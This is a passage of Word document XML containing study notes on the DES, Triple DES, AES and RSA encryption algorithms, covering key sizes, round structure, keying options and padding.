        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B11c - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE7A90">
        <w:t>Encryption algorithms: DES, 3DES, AES, RSA, RC4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="00CE7A90">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C10DED" w:rsidRPr="007A1198" w:rsidRDefault="00C10DED" w:rsidP="00CE7A90">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1198">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Data Encryption Standard (DES):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10DED" w:rsidRPr="00C10DED" w:rsidRDefault="00C10DED" w:rsidP="00C10DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10DED">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Block cipher based on a symmetric-key algorithm that uses a 56-bit key. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10DED" w:rsidRPr="00C10DED" w:rsidRDefault="00C10DED" w:rsidP="00C10DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10DED">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DES is now considered to be insecure for many applications. This is chiefly due to the 56-bit key size being too small; a DES key it has publicly been broken in 22 hours and 15 minutes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10DED" w:rsidRDefault="00C10DED" w:rsidP="00C10DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10DED">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DES is the archetypal block cipher — an algorithm that takes a fixed-length string of plaintext bits and transforms it through a series of complicated operations into another ciphertext bitstring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 and it is usually quoted as such.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10DED" w:rsidRDefault="00C10DED" w:rsidP="00C10DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Within t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10DED">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>he algorithm's structure there are 16 identical stages of processing, termed rounds. There is also an initial and final permutation, termed IP and FP, which are inverses (IP "undoes" the action of FP, and vice versa). IP and FP have almost no cryptographic significance, but were apparently included in order to facilitate loading blocks in and out of mid-1970s hardware, as well as to make DES run slower in software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1198" w:rsidRDefault="007A1198" w:rsidP="007A1198">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1198">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Before the main rounds, the block is divided into two 32-bit halves and processed alternately; this criss-crossing is known as the Feistel scheme. The Feistel structure ensures that decryption and encryption are very similar processes — the only difference is that the subkeys are applied in the reverse order when decrypting. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1198" w:rsidRDefault="007A1198" w:rsidP="007A1198">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The F-function</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1198">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> operates on half a block (32 bits) at a time and consists of four stages:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1198">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Expansion</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1198">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,Key</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1198">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mixing, Substitution, Permutation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1198" w:rsidRDefault="007A1198" w:rsidP="007A1198">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1198">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1198" w:rsidRPr="00E91BAD" w:rsidRDefault="007A1198" w:rsidP="007A1198">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Triple DES (3DES):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1198" w:rsidRPr="00723565" w:rsidRDefault="007A1198" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Named because it applies the Data Encryption Standard (DES) cipher algorithm three times to each data block.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1198" w:rsidRPr="00723565" w:rsidRDefault="007A1198" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Triple DES provides a relatively simple method of increasing the key size of DES to protect against brute force attacks, without requiring a completely new block cipher algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1198" w:rsidRPr="00723565" w:rsidRDefault="007A1198" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The standar</w:t>
      </w:r>
      <w:r w:rsidR="00723565" w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ds define three keying options:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1198" w:rsidRPr="00723565" w:rsidRDefault="007A1198" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Keying option 1: All three keys are independent. </w:t>
      </w:r>
      <w:r w:rsidR="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00723565" w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">trongest, with 3 x 56 = 168 independent key bits but due to the meet-in-the-middle attack the effective security it provides is only 112 bits. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723565" w:rsidRPr="00723565" w:rsidRDefault="007A1198" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Keying option 2: K1 and K2 are independent, and K3 = K1. </w:t>
      </w:r>
      <w:r w:rsidR="00723565" w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Less security, with 2 x 56 = 112 key bits. This option is stronger than simply DES encrypting twice, e.g. with K1 and K2, because it protects against meet-in-the-middle attacks. However, this option is susceptible to certain chosen-plaintext or known-plaintext attacks and thus it is designated by NIST to have only 80 bits of security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1198" w:rsidRDefault="007A1198" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Keying option 3: All three keys are identical, i.e. K1 = K2 = K3.</w:t>
      </w:r>
      <w:r w:rsidR="00723565" w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> No better than DES, with only 56 key bits. This option provides backward compatibility with DES, because the first and second DES operations simply cancel out.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723565" w:rsidRDefault="00723565" w:rsidP="00723565">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00723565" w:rsidRPr="00723565" w:rsidRDefault="00723565" w:rsidP="00723565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Advanced Encryption Standard (AES):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723565" w:rsidRPr="00723565" w:rsidRDefault="00723565" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The standard comprises three block ciphers, AES-128, AES-192 and AES-256, adopted from a larger collection originally published as Rijndael. Each of these ciphers has a 128-bit block size, with key sizes of 128, 192 and 256 bits, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723565" w:rsidRPr="00723565" w:rsidRDefault="00723565" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AES has a fixed block size of 128 bits and a key size of 128, 192, or 256 bits, whereas Rijndael can be specified with block and key sizes in any multiple of 32 bits, with a minimum of 128 bits. The blocksize has a maximum of 256 bits, but the keysize has theoretically no maximum.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723565" w:rsidRPr="00723565" w:rsidRDefault="00723565" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AES operates on a 4×4 array of bytes, termed the state (versions of Rijndael with a larger block size have additional columns in the state). Most AES calculations are done in a special finite field.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723565" w:rsidRDefault="00723565" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The AES cipher is specified as a number of repetitions of transformation rounds that convert the input plaintext into the final output of ciphertext. Each round consists of several processing steps, including one that depends on the encryption key. A set of reverse rounds are applied to transform ciphertext back into the original plaintext using the same encryption key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723565" w:rsidRPr="00723565" w:rsidRDefault="00723565" w:rsidP="00723565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>he only successful published a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ttacks against the full AES are</w:t>
      </w:r>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> side-channel attacks on some specific implementations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and theoretic </w:t>
      </w:r>
      <w:r w:rsidRPr="00723565">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>related-key attack</w:t>
      </w:r>
      <w:r w:rsidR="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">s which </w:t>
      </w:r>
      <w:r w:rsidR="00E00A6A" w:rsidRPr="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">aren't </w:t>
      </w:r>
      <w:r w:rsidR="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">currently </w:t>
      </w:r>
      <w:r w:rsidR="00E00A6A" w:rsidRPr="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>effective against full AES</w:t>
      </w:r>
      <w:r w:rsidR="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723565" w:rsidRDefault="00723565" w:rsidP="00723565">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E00A6A" w:rsidRPr="00E00A6A" w:rsidRDefault="00E00A6A" w:rsidP="00723565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E00A6A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RSA:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C62539" w:rsidRDefault="00E00A6A" w:rsidP="00E00A6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RSA (which stands for Rivest, Shamir and Adleman who first publicly described it) is an algorithm for public-key cryptography. It is the first algorithm known to be suitable for signing as well as encryption, and was one of the first great advances in public key cryptography. RSA is widely used in electronic commerce protocols, and is believed to be secure given sufficiently long keys and the use of up-to-date implementations.</w:t>
      </w:r>
      <w:r w:rsidR="00C62539">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00864659" w:rsidRDefault="00C62539" w:rsidP="00E00A6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62539">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RSA involves a public key and a private key. The public key can be known to everyone and is used for encrypting messages. Messages encrypted with the public key can only be decrypted using the private key.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The private key must be kept secure.</w:t>
      </w:r>
      <w:r w:rsidR="00864659">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00864659" w:rsidRPr="00864659" w:rsidRDefault="00864659" w:rsidP="00864659">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Message signing provides verification of origin and message integrity. The sender produces a hash of the message and uses their private key to create a signature that is appended to the ciphertext. The receiver also produces the same has of the message and used the sender public key on the hash to verify that the signature is from the sender.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C62539" w:rsidRPr="00864659" w:rsidRDefault="00C62539" w:rsidP="00864659">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62539">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>When used in practice, RSA is generally co</w:t>
      </w:r>
      <w:r w:rsidR="002E742A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mbined with some padding scheme which is used </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62539">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to prevent a number of attacks that potentially w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ork against RSA without padding. </w:t>
      </w:r>
      <w:r w:rsidR="002E742A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62539">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ractical RSA implementations typically embed structured, randomized padding into the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">message </w:t>
      </w:r>
      <w:r w:rsidR="002E742A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">so it will </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62539">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encrypt to one of a large number of different possible ciphertexts.</w:t>
      </w:r>
      <w:r w:rsidR="002E742A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E742A" w:rsidRPr="002E742A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Standards such as PKCS#1 have been carefully designed to securely pad messages prior to RSA encryption</w:t>
      </w:r>
      <w:r w:rsidR="002E742A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00864659">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Within PKCS#1 there are various schemes for encryption and dealing with signatures, some of the older versions of these schemes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00864659">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>has</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00864659">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> known weaknesses. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00864659" w:rsidRPr="00817C7B" w:rsidRDefault="00E00A6A" w:rsidP="00864659">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The security of the </w:t>
      </w:r>
      <w:r w:rsidR="00864659">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RSA cryptosystem is based on</w:t>
      </w:r>
      <w:r w:rsidRPr="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00864659">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the difficulty of solving </w:t>
      </w:r>
      <w:r w:rsidRPr="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mathematical problems</w:t>
      </w:r>
      <w:r w:rsidR="00864659">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and f</w:t>
      </w:r>
      <w:r w:rsidRPr="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ull decryption of an RSA ciphertext is thought to be infeasible on the assumption that both of these problems are </w:t>
      </w:r>
      <w:r w:rsidR="00864659">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">too </w:t>
      </w:r>
      <w:r w:rsidRPr="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hard, i.e., no efficient algorithm exists for solving them. </w:t>
      </w:r>
      <w:r w:rsidR="006F7B5A" w:rsidRPr="006F7B5A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>To achieve the full strength an RSA-based cryptosystem</w:t>
      </w:r>
      <w:r w:rsidR="006F7B5A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> must also use a padding scheme.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00A6A" w:rsidRPr="00E00A6A" w:rsidRDefault="00E00A6A" w:rsidP="00E00A6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E00A6A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
